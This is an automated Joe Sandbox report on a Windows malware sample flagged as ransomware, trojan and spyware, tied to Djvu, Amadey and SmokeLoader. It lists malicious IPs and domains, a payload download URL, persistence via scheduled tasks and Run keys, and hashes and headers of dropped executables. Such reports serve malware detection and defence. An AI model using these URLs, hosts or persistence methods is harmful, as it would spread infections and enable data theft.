                                                                                                unknown
                                                                                                http://zexeq.com/files/1/build3.exe$runD9721.exe, 00000014.00000002.798394056.0000000000755000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                http://www.google.com/9721.exe, 00000014.00000003.668848133.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs
                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  104.21.18.99
                                                                                                  unknownUnited States
                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                  201.124.31.170
                                                                                                  unknownMexico
                                                                                                  8151UninetSAdeCVMXtrue
                                                                                                  80.66.203.53
                                                                                                  shsplatform.co.ukUnited Kingdom
                                                                                                  61323UKFASTGBtrue
                                                                                                  211.168.53.110
                                                                                                  colisumy.comKorea Republic of
                                                                                                  3786LGDACOMLGDACOMCorporationKRtrue
                                                                                                  181.63.252.68
                                                                                                  zexeq.comColombia
                                                                                                  10620TelmexColombiaSACOtrue
                                                                                                  187.251.132.139
                                                                                                  unknownMexico
                                                                                                  18592CorporacionUniversitariaparaelDesarrollodeInternetAtrue
                                                                                                  45.9.74.80
                                                                                                  unknownRussian Federation
                                                                                                  200740FIRST-SERVER-EU-ASRUtrue
                                                                                                  103.233.24.19
                                                                                                  astoriaresidency.comIndia
                                                                                                  133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINtrue
                                                                                                  92.83.236.139
                                                                                                  toobussy.comRomania
                                                                                                  9050RTDBucharestRomaniaROtrue
                                                                                                  190.231.153.132
                                                                                                  unknownArgentina
                                                                                                  7303TelecomArgentinaSAARtrue
                                                                                                  154.221.19.146
                                                                                                  us.imgjeoigaa.comSeychelles
                                                                                                  133115HKKFGL-AS-APHKKwaifongGroupLimitedHKfalse
                                                                                                  188.114.96.7
                                                                                                  potunulit.orgEuropean Union
                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                  211.171.233.129
                                                                                                  unknownKorea Republic of
                                                                                                  3786LGDACOMLGDACOMCorporationKRfalse
                                                                                                  190.103.205.174
                                                                                                  unknownArgentina
                                                                                                  27987NODOCOOPFederaciondeCooperativasLtdaARtrue
                                                                                                  186.182.55.44
                                                                                                  unknownArgentina
                                                                                                  11664TechtelLMDSComunicacionesInteractivasSAARfalse
                                                                                                  162.0.217.254
                                                                                                  api.2ip.uaCanada
                                                                                                  35893ACPCAfalse
                                                                                                  39.109.117.57
                                                                                                  as.imgjeoigaa.comHong Kong
                                                                                                  133115HKKFGL-AS-APHKKwaifongGroupLimitedHKfalse
                                                                                                  190.229.19.7
                                                                                                  unknownArgentina
                                                                                                  7303TelecomArgentinaSAARtrue
                                                                                                  IP
                                                                                                  192.168.2.1
                                                                                                  Joe Sandbox Version:37.1.0 Beryl
                                                                                                  Analysis ID:892263
                                                                                                  Start date and time:2023-06-21 20:22:06 +02:00
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 13m 31s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                  Number of analysed new started processes analysed:39
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:2
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample file name:file.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.rans.troj.spyw.evad.winEXE@70/195@53/19
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HDC Information:
                                                                                                  • Successful, ratio: 56% (good quality ratio 50%)
                                                                                                  • Quality average: 73.4%
                                                                                                  • Quality standard deviation: 34.4%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 87%
                                                                                                  • Number of executed functions: 45
                                                                                                  • Number of non-executed functions: 93
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Exclude process from analysis (whitelisted): Conhost.exe, audiodg.exe, dllhost.exe, consent.exe, WMIADAP.exe, svchost.exe
                                                                                                  • Excluded domains from analysis (whitelisted): login.live.com, t.me, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                  TimeTypeDescription
                                                                                                  20:23:36Task SchedulerRun new task: Firefox Default Browser Agent CDF023E8BF0BE8D2 path: C:\Users\user\AppData\Roaming\uwjrhss
                                                                                                  20:23:36API Interceptor564x Sleep call for process: explorer.exe modified
                                                                                                  20:23:47Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe s>--Task
                                                                                                  20:23:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                                                                                                  20:23:57API Interceptor1x Sleep call for process: 9721.exe modified
                                                                                                  20:23:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                                                                                                  20:24:01API Interceptor1x Sleep call for process: 46F.exe modified
                                                                                                  20:24:11Task SchedulerRun new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                  20:24:17Task SchedulerRun new task: oneetx.exe path: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                                  20:24:31Task SchedulerRun new task: Firefox Default Browser Agent 967E7123DD9A6347 path: C:\Users\user\AppData\Roaming\tgjrhss
                                                                                                  20:24:44API Interceptor4x Sleep call for process: aafg31.exe modified
                                                                                                  20:25:05Task SchedulerRun new task: NoteUpdateTaskMachineQC path: C:\Program Files\Notepad\Chrome\updater.exe
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  104.21.18.99setup.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  24z5gz0uJi.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  setup.exeGet hashmaliciousDanaBot, Djvu, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  file.exeGet hashmaliciousAmadey, Djvu, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  file.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  file.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  hZiXDe4WZO.exeGet hashmaliciousAmadey, Djvu, RedLine, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, RedLine, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  file.exeGet hashmaliciousAmadey, Djvu, LummaC Stealer, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  setup.exeGet hashmaliciousAmadey, Clipboard Hijacker, Djvu, LummaC Stealer, ManusCrypt, Nitol, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  setup.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  setup.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                                                                                  • potunulit.org/
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, RedLine, SmokeLoader, VidarBrowse
                                                                                                  • potunulit.org/
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                                  • potunulit.org/
                                                                                                  OYm3R777Yb.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, Raccoon Stealer v2, RedLine, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  r7icIGgp7u.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, RedLine, SmokeLoader, VidarBrowse
                                                                                                  • potunulit.org/
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                                                                                  • potunulit.org/
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  toobussy.comfile.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, PrivateLoader, SmokeLoaderBrowse
                                                                                                  • 190.224.203.37
                                                                                                  file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, PrivateLoader, SmokeLoaderBrowse
                                                                                                  • 201.124.31.170
                                                                                                  file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, PrivateLoader, SmokeLoaderBrowse
                                                                                                  • 77.28.83.241
                                                                                                  file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, PrivateLoader, SmokeLoader, VidarBrowse
                                                                                                  • 123.231.118.19
                                                                                                  file.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                  • 187.251.132.139
                                                                                                  file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                  • 190.219.153.101
                                                                                                  f0AR4IA7vR.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                  • 187.18.108.158
                                                                                                  UAZA81FNVU.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                  • 185.252.190.197
                                                                                                  file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                  • 201.119.66.140
                                                                                                  file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                  • 168.187.75.100
                                                                                                  file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                  • 77.28.103.105
                                                                                                  file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                  • 211.119.84.111
                                                                                                  file.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                  • 61.253.71.111
                                                                                                  file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                  • 186.215.44.177
                                                                                                  file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                  • 187.147.242.59
                                                                                                  file.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                  • 187.224.116.41
                                                                                                  file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                  • 62.217.232.10
                                                                                                  file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                  • 211.119.84.112
                                                                                                  file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                  • 60.246.80.61
                                                                                                  file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                  • 181.4.66.66
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  CLOUDFLARENETUSACH 905768.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.17.24.14
                                                                                                  https://nts.embluemail.com/p/cl?data=pI8VwGcwddZQxizp6iKIt7PtnkbrqYTrtTALAIaqH%2FY7KnjMUoRwI7JLNP%2FdtkwqDcG5bblwZh4yY4%2FlvW34EfW8bivU8x1iL0RsNN6ySCk%3D!-!6a1bk6,!-!https://www.paperturn-view.com/?pid=MzM334976Get hashmaliciousReCaptcha PhishBrowse
                                                                                                  • 104.16.169.131
                                                                                                  #6890957010.docx.docGet hashmaliciousUnknownBrowse
                                                                                                  • 104.17.24.14
                                                                                                  SecuriteInfo.com.DeepScan.Generic.Trojan.Genesis.Marte.A.46E52461.11393.13146.dllGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.7
                                                                                                  SecuriteInfo.com.DeepScan.Generic.Trojan.Genesis.Marte.A.5C51B46D.21286.1173.dllGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.7
                                                                                                  #6890957010.docx.docGet hashmaliciousUnknownBrowse
                                                                                                  • 104.17.25.14
                                                                                                  http://s.clGet hashmaliciousUnknownBrowse
                                                                                                  • 1.1.1.1
                                                                                                  _Voice_Message_YAz5b6SAd6.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.17.24.14
                                                                                                  834892 ___fdp.HTMGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 188.114.96.3
                                                                                                  secure#inv90799000.htmGet hashmaliciousUnknownBrowse
                                                                                                  • 104.17.25.14
                                                                                                  https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https%3A%2F%2Finsidecommerce.sa.com%2F%23bGltaW5nLnRhbmdAZXhwLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                  • 1.1.1.1
                                                                                                  #Ufe0fEFT_748938777473629.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 1.1.1.1
                                                                                                  http://wetxgf.hipros.topGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  https://chipotle.app.link/?$3p=e_et&$fallback_url=http://rwaeav.itjre.floornwallmall.com%2FbHlubi5icnVuc0Bpc2dpbmMuY29tGet hashmaliciousUnknownBrowse
                                                                                                  • 104.16.56.101
                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.17.88
                                                                                                  data.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 1.1.1.1
                                                                                                  https://www.picotech.com/download/software/sr/PicoScope_7.1.2.15463_TnM_Stable.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.20.205.27
                                                                                                  calpinesolutions.com Fax.htmlGet hashmaliciousUnknownBrowse
                                                                                                  • 1.1.1.1
                                                                                                  file.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  • 162.159.130.233
                                                                                                  OriginalMessage.txt.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 1.1.1.1
                                                                                                  No context
                                                                                                  No context
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):42
                                                                                                  Entropy (8bit):4.773269803731142
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:t3skC+g25ds2h6itjeL:JsLO5dXVjeL
                                                                                                  MD5:47FFAAD812DDEFBBD7D76445401555C7
                                                                                                  SHA1:2A480DE9AD299F9DF36C11E2AE110BCB4EB3A6CD
                                                                                                  SHA-256:34339241BBAC1CAAF14B3A047CE631E0195A13A8E8B35DA53F8860427D17DC30
                                                                                                  SHA-512:BEC1E177C89BC97F27FF5D737575F22EAE86505FC05938BB46C98BA81A69D6630181997E40B9180A72EFFA3FF3FAD854748CD8D1CA3257530A0710CE7192DF8A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:m5nCajqyEggMKwE5MKR2fPYUnjqSDp5pb5HFa467..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):458
                                                                                                  Entropy (8bit):7.4027942931685375
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:PVhNjMchq/2AZ3rcqKJfhpOy8s1rIUAXdw10wVdcii9a:PJQcM/2Al5KnpFN1rIdo0qbD
                                                                                                  MD5:2434E3DFDCBA4816A5AAA23ABEEC90C6
                                                                                                  SHA1:1E2E1EC06F03FBCD6A21E7D3F8336391CD801859
                                                                                                  SHA-256:A7B9D97F136704B1E089CA16564E833384002CBE8A069E25D6B78DE78045733B
                                                                                                  SHA-512:190CF37F6091281C66B4FB5E1AC49EC428D63AB04D2BF19CEE53214EA8A6D487C21781577E2998519C462880AE69794A1BDEF1E0B5B8C94ECBFEE42251EF8F80
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:2019/..........b}u.g.[..1..".hIp........F><.)..g.Y=.P........h.<...b...)...Oo:.z.AH...O.B?......04....G..*..I./...y..ag..]#.\....>......pFO..c.a..}.......t<[.e...ro.?....RJ...? ..\...hR..HN...=.....2.c...H..'...'<.1.=9.g.?#.\F...Is..h...g...0*..[A...?..p ?(..._m.Mx.u8....G...."K..*.Zx:..V......../a]...@..s6.o5H.v.t....m..[.[.>9.....@=.:u.N.....Mx......m5nCajqyEggMKwE5MKR2fPYUnjqSDp5pb5HFa467{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):458
                                                                                                  Entropy (8bit):7.4027942931685375
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:PVhNjMchq/2AZ3rcqKJfhpOy8s1rIUAXdw10wVdcii9a:PJQcM/2Al5KnpFN1rIdo0qbD
                                                                                                  MD5:2434E3DFDCBA4816A5AAA23ABEEC90C6
                                                                                                  SHA1:1E2E1EC06F03FBCD6A21E7D3F8336391CD801859
                                                                                                  SHA-256:A7B9D97F136704B1E089CA16564E833384002CBE8A069E25D6B78DE78045733B
                                                                                                  SHA-512:190CF37F6091281C66B4FB5E1AC49EC428D63AB04D2BF19CEE53214EA8A6D487C21781577E2998519C462880AE69794A1BDEF1E0B5B8C94ECBFEE42251EF8F80
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:2019/..........b}u.g.[..1..".hIp........F><.)..g.Y=.P........h.<...b...)...Oo:.z.AH...O.B?......04....G..*..I./...y..ag..]#.\....>......pFO..c.a..}.......t<[.e...ro.?....RJ...? ..\...hR..HN...=.....2.c...H..'...'<.1.=9.g.?#.\F...Is..h...g...0*..[A...?..p ?(..._m.Mx.u8....G...."K..*.Zx:..V......../a]...@..s6.o5H.v.t....m..[.[.>9.....@=.:u.N.....Mx......m5nCajqyEggMKwE5MKR2fPYUnjqSDp5pb5HFa467{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):347
                                                                                                  Entropy (8bit):7.280743384487559
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:E89/nmGwxXQKhVqH3xzZNp/HdttZBu1WB9E65kZSUWLO5dXVjeLscii96Z:bnmGCYH3xzzp/HdfZBl9E66+wVdcii9a
                                                                                                  MD5:74CCEBC0F4D95A7CCFE3BE4A706030FE
                                                                                                  SHA1:DBB13290E2D1BFD8FAC1C9F737F8EB523BAF19E0
                                                                                                  SHA-256:1F4DBA8C21DAB99B285254EB5E16EF8F722478F7FA20423B60289FB5E8A4065E
                                                                                                  SHA-512:F2DF1674A1BA18AACC65CD66B9F8A64991302FF9B5B677170E3F23860F1597CA05C100185B3E08A335FA798B74EEEEF72CC93CB95B6C84FEFD0F66C50F867D4D
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:<root..V.J.v2.2.0..TX0.[n.:M..8nl...FNo.,...L.}.c..E.4..L...io.L.:..........a7P..:.G!..N......i..A..........,...........`$.)..V.....Q.....cF..1_..R.#...8...|.+.Z...b.*....K....w....".K....>lo..&.....?J.P.*..A.E..v....x.n..,;G1.A...n@k0).,......<.w... r..m5nCajqyEggMKwE5MKR2fPYUnjqSDp5pb5HFa467{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):347
                                                                                                  Entropy (8bit):7.280743384487559
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:E89/nmGwxXQKhVqH3xzZNp/HdttZBu1WB9E65kZSUWLO5dXVjeLscii96Z:bnmGCYH3xzzp/HdfZBl9E66+wVdcii9a
                                                                                                  MD5:74CCEBC0F4D95A7CCFE3BE4A706030FE
                                                                                                  SHA1:DBB13290E2D1BFD8FAC1C9F737F8EB523BAF19E0
                                                                                                  SHA-256:1F4DBA8C21DAB99B285254EB5E16EF8F722478F7FA20423B60289FB5E8A4065E
                                                                                                  SHA-512:F2DF1674A1BA18AACC65CD66B9F8A64991302FF9B5B677170E3F23860F1597CA05C100185B3E08A335FA798B74EEEEF72CC93CB95B6C84FEFD0F66C50F867D4D
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview:<root..V.J.v2.2.0..TX0.[n.:M..8nl...FNo.,...L.}.c..E.4..L...io.L.:..........a7P..:.G!..N......i..A..........,...........`$.)..V.....Q.....cF..1_..R.#...8...|.+.Z...b.*....K....w....".K....>lo..&.....?J.P.*..A.E..v....x.n..,;G1.A...n@k0).,......<.w... r..m5nCajqyEggMKwE5MKR2fPYUnjqSDp5pb5HFa467{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):742400
                                                                                                  Entropy (8bit):7.782332279449587
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:0Qa2f+IfiStG/+51mT5x7EVEk1wnTjU+UBWyjsBzez84pZBy:0E+IfxtG/2Y5x7EVEk0TjUBpjsRIhp
                                                                                                  MD5:122E0DC413CD47850CB2C9547351D03C
                                                                                                  SHA1:6205E5A03AA803679C6A09E772B35F17EF4926C6
                                                                                                  SHA-256:A3B611FB81DD20251FC99C4B27C62DA4DD09E7401AB9B32E41BE3DA8AFCE379C
                                                                                                  SHA-512:29C5927B0F6F86EE8553646AE55558CA2D4948820FDC5D45D5A1499FF65FE3A2653E58738DDCDDF1D98A8AAE7DBFCB3E9D7546FDDCD0ABCF932C2DA54B4897C9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................].o......i......].......\......d.............X......m......j....Rich...........................PE..L...3..a.................@....z......T.......P....@..........................p{.............................................C..<.....z.............................................................X6..@............................................text....>.......@.................. ..`.data...x.y..P...*...D..............@....xoju...D....pz......n..............@....rsrc.........z......r..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\46F.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):348672
                                                                                                  Entropy (8bit):7.184133278122481
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:Rre2Ofp8rQ5BJiHnx/PFy0nrFh4QtcOE1+GayRx9K4o78EZm:Ri1f+8jJSty07sp7HJ+
                                                                                                  MD5:B7133C4070082747C60BF6191A5F70DE
                                                                                                  SHA1:A7568A93D9DC79A211270736C5989C5F6635E9B6
                                                                                                  SHA-256:A96E080EE195FB2333191FB38C7A66E0C0BD029AF6480DC489A8C8113E5B03A9
                                                                                                  SHA-512:F3DD85289894E9DDFD61D1D5B5CB479B97D7E0759327236B72150D22B790A2492BD4929D8427AAC50B48ED6E7E18ABCCBE401CB7D5F5DEB683E8C813AFBB72FE
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 58%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e..e!.6!.6!.6..'6 .6N.!65.6N..6N.6N..6..6(.,6".6!.6].6N..6 .6N.%6 .6N."6 .6Rich!.6........................PE..L...i..c.................>....t......R.......P....@..........................`u.............................................DB..(....`t.x............................................................4..@............................................text....<.......>.................. ..`.data...8.r..P.......B..............@....wida........@t......>..............@....rsrc...x....`t......V..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\46F.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9728
                                                                                                  Entropy (8bit):5.3362059272001
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:9UEc8b6H1LE+4LoGgMatAJ2lzUw317NyEpvNHhqyo:9UUE1BYoGza/D3170kiyo
                                                                                                  MD5:9EAD10C08E72AE41921191F8DB39BC16
                                                                                                  SHA1:ABE3BCE01CD34AFC88E2C838173F8C2BD0090AE1
                                                                                                  SHA-256:8D7F0E6B6877BDFB9F4531AFAFD0451F7D17F0AC24E2F2427E9B4ECC5452B9F0
                                                                                                  SHA-512:AA35DBC59A3589DF2763E76A495CE5A9E62196628B4C1D098ADD38BD7F27C49EDF93A66FB8507FB746E37EE32932DA2460E440F241ABE1A5A279ABCC1E5FFE4A
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exe, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exe, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exe, Author: unknown
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                                                                  Reputation:unknown
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................o......o......Rich...........................PE..L......a.....................................0....@..........................`............@..................................:..<............................P..,....9..8............................................0..0............................text............................... ..`.rdata.......0......................@..@.data...`....@......................@....reloc..,....P......."..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):348672
                                                                                                  Entropy (8bit):7.184133278122481
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:Rre2Ofp8rQ5BJiHnx/PFy0nrFh4QtcOE1+GayRx9K4o78EZm:Ri1f+8jJSty07sp7HJ+
                                                                                                  MD5:B7133C4070082747C60BF6191A5F70DE
                                                                                                  SHA1:A7568A93D9DC79A211270736C5989C5F6635E9B6
                                                                                                  SHA-256:A96E080EE195FB2333191FB38C7A66E0C0BD029AF6480DC489A8C8113E5B03A9
                                                                                                  SHA-512:F3DD85289894E9DDFD61D1D5B5CB479B97D7E0759327236B72150D22B790A2492BD4929D8427AAC50B48ED6E7E18ABCCBE401CB7D5F5DEB683E8C813AFBB72FE
                                                                                                  Malicious:true
